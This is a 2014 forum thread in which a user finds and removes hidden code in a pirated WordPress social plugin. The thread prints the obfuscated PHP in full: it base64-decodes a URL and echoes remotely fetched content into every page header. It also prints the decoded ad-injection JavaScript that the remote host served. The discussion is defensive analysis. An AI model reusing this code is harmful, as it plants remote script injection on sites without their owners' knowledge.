1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[URGENT] Base64 found in plugin, could you please have a look and advise

Discussion in 'BlackHat Lounge' started by Mr Grey, Feb 6, 2014.

  1. Mr Grey

    Mr Grey Newbie

    Joined:
    Jul 15, 2013
    Messages:
    28
    Likes Received:
    2
    Hi guys,

    I got myself a copy of the social plugin called Ultimate Social Deux (it's basicly a plugin to like, tweet and shit -check it out on CodeCanyon if you want.

    I tested it with TotalVirus, no problem. Once installed I scanned the files and found a base 64 code. It might not be some dodgy stuff but I'm not sure sure so please have a look and let me know hat you think.

    Code:
    <?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(96,1) == 1) {function secc2_check() {if(function_exists('curl_init'))    {$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secc2_check');}}?>
    Once decoded, the base64 code means "spamcheckr.com/check.php". I've checked the url and it's a blank page...

    What do you think ?

    Thanks ;)
     
  2. cicklow

    cicklow Newbie

    Joined:
    Jan 13, 2009
    Messages:
    21
    Likes Received:
    22
    Home Page:
    NO blank page is a JavaScript Code:
    Code:
    <Script Language='Javascript'>
    <!--  -->
    <!--
    document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%09%76%61%72%20%69%64%5F%75%73%65%72%20%3D%20%32%30%38%37%30%31%3B%0A%09%76%61%72%20%64%6F%6D%61%69%6E%73%5F%65%78%63%6C%75%64%65%20%3D%20%5B%27%61%66%66%69%6C%69%61%74%65%73%2E%70%6C%61%79%62%6F%79%2E%63%6F%6D%27%2C%20%27%65%6C%70%65%72%75%74%69%65%6E%65%74%61%6C%65%6E%74%6F%2E%63%6F%6D%27%2C%20%27%73%6B%65%65%7A%79%62%61%62%65%73%2E%63%6F%6D%27%2C%20%27%77%70%2D%61%64%6D%69%6E%27%2C%20%27%6B%61%6D%61%70%69%73%61%63%68%69%2E%69%6E%66%6F%27%2C%20%27%6E%75%64%65%27%2C%20%27%73%65%78%27%2C%20%27%70%6F%72%6E%27%2C%20%27%6E%61%6B%65%64%27%2C%20%27%66%75%63%6B%27%2C%20%27%63%6F%63%6B%27%2C%20%27%70%65%6E%69%73%27%2C%20%27%74%69%74%73%27%2C%20%27%62%6F%6F%62%73%27%2C%20%27%70%75%73%73%79%27%2C%20%27%61%79%62%69%6B%65%2E%61%76%75%6B%61%74%6C%61%72%61%77%65%62%73%69%74%65%73%69%2E%63%6F%6D%27%5D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%66%6F%63%2E%75%73%2F%6A%73%2F%66%75%6C%6C%70%61%67%65%2F%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
    //-->
    </Script>
    
    Decripted
    Code:
    <script type="text/javascript">
        var id_user = 208701;
        var domains_exclude = ['affiliates.playboy.com', 'elperutienetalento.com', 'skeezybabes.com', 'wp-admin', 'kamapisachi.info', 'nude', 'sex', 'porn', 'naked', 'fuck', 'cock', 'penis', 'tits', 'boobs', 'pussy', 'aybike.avukatlarawebsitesi.com'];
    </script>
    <script type="text/javascript" src="http : / / adfoc.us/js/fullpage/script.js"></script>
    
    Delete that code, as it is a script to place advertising on your site
    PD: You bought this script or downloaded from somewhere?
     
    Last edited: Feb 6, 2014
  3. Bill Gates

    Bill Gates Registered Member

    Joined:
    Jan 5, 2009
    Messages:
    93
    Likes Received:
    465
    I can confirm that this was probably downloaded from a BHF somewhere or torrent site because this has happened to me quite a few times in the past (before I weaned myself off of these things).
     
  4. Mr Grey

    Mr Grey Newbie

    Joined:
    Jul 15, 2013
    Messages:
    28
    Likes Received:
    2
    Thanks, it is indead a plugin that as been downloaded from somewhere. I didn't bought it.

    I'm gonna remove that code and scan again. We'll se what happened :)

    Thanks for tremendous help guys ;) Always nice to have people to rely on when you're not sure about the decision to make.

    Cheers !
     
  5. Mr Grey

    Mr Grey Newbie

    Joined:
    Jul 15, 2013
    Messages:
    28
    Likes Received:
    2
    Ok, I've remove the entire file. It was basicly a huge pile of shit ( CSS stuff in between a
    Code:
    <?php /*......../*?>
    ) and the malicious code.

    I used the exploit scanner plugin from Wordpress. Great stuff ! Now the plugin is clean and working. Too bad I haven't the privilege to post file on here. Otherwise, I would share it with you guys :)